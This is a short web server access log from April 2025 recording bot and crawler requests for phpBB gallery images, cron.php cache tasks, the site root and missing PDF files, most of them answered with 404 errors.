151.106.164.53 - - [10/Apr/2025:23:49:10 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=115&sid=669362553ce370259aee3a1d9b4f7bb1 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.53 - - [10/Apr/2025:23:49:10 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=115&sid=669362553ce370259aee3a1d9b4f7bb1 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.53 - - [10/Apr/2025:23:49:11 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=115&sid=669362553ce370259aee3a1d9b4f7bb1 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.54 - - [10/Apr/2025:23:49:55 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [10/Apr/2025:23:54:07 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.106.167.56 - - [10/Apr/2025:23:54:42 +0200] "GET /cron.php?cron_type=tidy_cache&sid=ad5974e6a85e65e030858e93e1b425a7 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.167.56 - - [10/Apr/2025:23:54:43 +0200] "GET /cron.php?cron_type=tidy_cache&sid=ad5974e6a85e65e030858e93e1b425a7 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.167.56 - - [10/Apr/2025:23:54:43 +0200] "GET /cron.php?cron_type=tidy_cache&sid=ad5974e6a85e65e030858e93e1b425a7 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
156.59.198.136 - - [10/Apr/2025:23:55:05 +0200] "GET /docs/contadino/2018/RECHNUNG/RE18-00009.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.81.156.10 - - [10/Apr/2025:23:55:53 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [10/Apr/2025:23:56:55 +0200] "GET /renault.activities.at/htdocs/binaries/10352421.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
151.106.191.239 - - [11/Apr/2025:00:01:38 +0200] "GET /cron.php?cron_type=tidy_cache&sid=7ef1f254aa419c7fd90bd9ff0f1b449d HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
